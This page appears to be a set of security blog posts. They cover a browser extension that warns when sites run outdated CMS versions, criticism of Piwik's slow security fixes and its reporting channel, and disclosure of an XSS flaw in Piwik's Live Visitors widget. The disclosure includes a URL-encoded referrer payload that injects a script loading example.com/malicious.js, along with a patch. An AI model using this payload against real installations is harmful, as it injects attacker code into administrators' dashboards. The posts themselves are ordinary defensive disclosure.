Our New Web Browser Extension to Warn When Outdated Software is Being Used

We are always looking for ways how we can help to improve the security of the web. One of the basic security measures that needs to be taken to keep websites secure is keeping the software running on them up to date, as newer releases often contain security fixes and enhancements.

The developers of web software have done a lot to make that easier by providing messages in the software that the websites is in need of update and making the update process easier. Even with this there is still many website running outdated versions of that software.

When we are in touch with people running websites whether they are potential clients, people we are contacting to let them know their website has been hacked, or for some other reasons, we make sure to let them know if we see they are running outdated software that needs to be updated. We only reach a limited number of people so to increase awareness that outdated software is running on websites we have created a new web browser extension, named Meta Generator Version Check, to make it easier for others to see when there is outdated software running a website.

With the web browser extension installed, each time a web page finishes loading the extension checks the web page’s source code for a meta generator tag. The one for the current version of WordPress looks like:

<meta name="generator" content="WordPress 3.2.1" />

After reading that, the extension then provides a warning if it detects one of the following software is running on the website:

  • WordPress versions prior to 3.2.1
  • Joomla 1.0 and Joomla 1.6
  • Mediawiki versions 1.16.4-1.13 (earlier versions do not contain a meta generator tag)
  • vBulletin versions prior to 3.8.7
  • TYPO3 versions prior to 4.3
  • Movable Type versions prior to 4.37, 5.06, and 5.12
  • Melody versions prior to 1.0.2

Looking at that list you might notice that there is a fair amount of software missing. The limitation of checking the meta generator is that not all software produces one and some of those that do, do not provide a tag that allows us to identify what version is running. In other cases only partial version information is given. For Joomla, this means the extension can warn about websites running Joomla 1.0 and 1.6, which are no longer supported, but for Joomla 1.5 and Joomla 1.7 there is no indication if they are running the current version of those, as of yesterday they were 1.5.24 and 1.7.2, or an older version.

Another issue we have found as we looked to add checks for more software is that the supported versions of software are not always easy to find. We would recommend that software developers make sure that they prominently display what versions of their software are supported so that people looking for that information can easily find it.

If you see that we are missing a check for software that provides the required information in the meta generator tag please let us know so that we can include that in the extension.

While it would be possible to have the extension do a more intensive check to determine what version of software is running on website, using information not available in the meta generator tag, this would in most cases require requesting additional files when each page is loaded and would provide information that is not being made available by the web page itself.

We currently plan to update the extension to warn that software is outdated a month after a subsequent version has been released or support has ended for a version. For severe security vulnerabilities the extension may e updated sooner provide an earlier warning.

Uses

The main use for the extension is to be alerted that websites that you are visiting are running outdated software so that you can let them know that they need to update it or if they are your client you can do the update yourself.

It also could be useful in looking at who you considering doing business with or what software you might use on your website.

If a web host isn’t keeping software on the frontend of their website updated, it is reasonable to be concerned that they might not be taking proper security measures for their hosting clients as well. After checking just a few web hosts we found that both Just Host (3.0.3) and IX Web Hosting (3.1) were running outdated version of WordPress. It is also interesting to note that homepage of IX Web Hosting’s website has security seals from both McAfee Secure and something called Ecommerce HackerShield (which appears to something created IX Web Hosting’s parent company) claiming the website is secure despite the outdated software, with known security vulnerabilities, running on a sub-domain of the website and linked directly from the homepage.

For software, an example of something that might be concerning that we just noticed with a piece of software that we run on our website, Piwik, is that their website is still running WordPress 3.0.4.

Availability

A version of the extension is now available for Chrome. A version for Firefox is currently pending a review from Mozilla. The Firefox version has some limitations in comparison to the Chrome version due to current limitations of the Mozilla Add-On SDK, as the Add-on SDK is further developed those limitations will also go away. A version for Safari will not be released until Apple modernizes their enrollment process for Safari Extension development.

You can also find a web-based version of the tool here.

Is Running Outdated Software Always a Security Concern?

Outdated software is not automatically less secure than a newer version, it would only be more insecure if it contains a security vulnerability that does not exist in a newer version. Often new releases include fixes for security vulnerabilities or security enhancements. There is also a possibility that changes have been made in a newer version that removed a security vulnerability that was not known to be security vulnerability at the time. To be safe it is a good rule to update the software even if the developers have not warned of vulnerabilities in prior versions. To keep things simple we have decided that the extension will warn if outdated version is running instead providing a warning only when we know an old version contains a security vulnerability.

Is Including a Meta Generator a Security Concern?

With software that includes a meta generator tag there are often people claiming that it makes websites less secure, this is especially true when it comes to WordPress.  We previously discussed the issue in detail in regards to WordPress. The summary of that is as follows: The bad guys are not generally checking the meta generator tag and they usually don’t even check if you are running the software they are trying to exploit. On a daily basic there are attempts to exploit software that is not and has never been on our website. Because the bad guys attempting to exploit vulnerabilities do not bother to check what version of software you are running the website, you will get hacked if you are running a version with that vulnerability even if you managed to completely hide the version running. Finally, if someone wanted to find out what version you are running they could do that even if you remove the meta generator tag.

With our new extension we think it makes even more sense to include a meta generator tag as it increases the usefulness of the tag by letting people inform others they have outdated software running on their website that needs to be updated.

Piwik Releases Fix for Cross-Site Scripting (XSS) Vulnerability

On Tuesday Piwik released Piwik 1.1 which fixed the cross-site scripting (XSS) vulnerability in the Live Visitors! widget (renamed Visitors in Real Time in the new version)which we previously wrote about. The fix was released just over a month after we contacted them about the issue and two weeks after they apparently became aware of us contacting them. Based on contact with them it seems possible that could have become aware of the issue as long ago as August 28th, four months before they fixed it. A number of cross-site scripting vulnerabilities were also fixed in the release but no details have been provided on those. There was also a professional security audit done for Piwk 1.1, unfortunately that audit was only focused on the source code and not at Piwik’s security process which we believe have some serious problems. These include not having a reliable way for security issues to be reported and not promptly releasing fixes for security vulnerabilities.

Piwik’s choice to wait for the next major release to fix the vulnerability instead of promptly releasing a security release also exposed another problem with this type of approach. Users were told the release was critical and they should “update now”,  but when users did it caused some Piwik installations to stop working. Piwik then released an update the next day which solved the most serious problems, but it appears a number of serious issues still exist. If the security updates had been separately released then they could have applied promptly and users could have taken more time, possibly testing the new version on development website, before upgrading the next major release which would have likely lead to less users experiencing these bugs.

Piwik is Knowingly Leaving Users Vulnerable to Cross-Site Scripting (XSS) Issue

Two days we posted about a cross-site scripting (XSS) vulnerability in the Piwik’s Live Visitors! widget and we have now received a email response from Piwik. In their response they told us that the vulnerability had already been reported to them. Unfortunately, their response also indicated that they have been waiting to fix the vulnerability in their next major release instead of releasing a security release to fix the issue promptly after they became aware of it.

While the vulnerability would be difficult to exploit, as we discussed in our previous post, and would require a separately created malicious payload to be dangerous, it certainly seems to be something that should have been promptly fixed. Considering that there have been at least two reports to Piwik it is likely that others are aware of the issue. Piwik also seems to think it is a serious issue, as they left a comment in our previous post requesting that we make the post private (something we would have done if  a fix was going to be released in a timely manner) and they were critical of our public release of the information.

WordPress, which we consider to follow responsible security practices, appears to promptly release fixes for security vulnerabilities instead of waiting for the next major release. Last year they even back-ported security enhancements developed for their next major release to the current version to improve security.

Until they decide to release a fix to the vulnerability, you can protect yourself by removing the Live Visitors! widget from your Dashboard or apply the fix mentioned in our previous post, which appears to fix the issue.

Assuming that Piwik was not aware of the vulnerability before releasing the most recent version, Piwik 1.0, they could have possibly known about the vulnerability as far back as August 28th.

What was also troubling was that Piwik apparently did not receive the messages we sent them. Both the email we received and the comment on our previous post claimed they had not received our emails, though in our original post we only mentioned that we contacted them and not that we had emailed them. In the email we received from them they stated “If your email contained an example URL similar to the one in your blog post, then it quite likely got filtered as spam or malicious content (i.e., phishing).” This is a problem as it means that Piwik could not be receiving other reports of security vulnerabilities and they could then be left unfixed. Since our original posting they have created a new security page on their website that mentions the problem with their spam filter. Hopefully, Piwik will take the further step either fix the current reporting system or create a new one so that they can insure they receive security vulnerabilities reports in the future.

We certainly don’t want to be overly critical of Piwik, but their response to this issue is very troubling to us because we use Piwik on our website and we recommend and promote the software to others.

Cross-Site Scripting (XSS) Vulnerability in Piwik’s Live Visitors! Widget

The Live Visitors! widget for Piwik, an open source web analytics software similar to Google Analytics, contains a cross-site scripting (XSS) vulnerability which can allow malicious HTML to be added to Piwik’s Dashboard. The Dashboard is the page that users come to after logging in to Piwik and contains an overview of statistics.  The Live Visitors! widget was added to default Dashboard with Piwik 1.0.

The vulnerability exist because the Live Visitors! widget does not properly sanitize special characters from the referer_keyword field of the piwik_log_visit table in the database. The referer_keyword field stores the keyword(s) that a user had search for when they visit the website through a search engine. This vulnerability can be used to add malicious HTML code to the Dashboard while a visitor with a special crafted referer is currently being displayed in the Live Visitors! widget. For example, the following referrer would create a script tag calling the file example.com/malicious.js:

http://www.google.com/search?q=%3Cscript%20type%3D%22text%2Fjavascript%22%20src%3D%22http%3A%2F%2Fexample.com%2Fmalicious.js%22%3E

The example.com/malicious.js could contain code that attempts to install malware on a computer or have some other malicious purpose.

For this to be exploited the victim would have to have the dashboard open when the visitor with the malicious code was being shown. The widget displays the last 10 visitors, so for high traffic website a visitor would appear for only a short time. By default Piwik only track visitors with JavaScript enabled, so just making GET requests with a malicious referer would not allow the vulnerability to be exploited.

We twice contacted Piwik’s security team about the issue. On December 2nd we provided them with basic details of the issue and on December 14th we contacted them with additional details of the issue and a possible fix for the issue. We have not received any response from them.

To insure that you are protected from the vulnerability being exploited you can remove the Live Visitors! widget from the Dashboard. A change that appears to fix the issue is to modify the following line in the file /plugins/Live/Visitor.php from

return $this->details[‘referer_keyword’];

to

return htmlspecialchars($this->details[‘referer_keyword’]);

This change will cause special characters to be converted to HTML entities, so you would see the malicious code in text form instead of it being executed.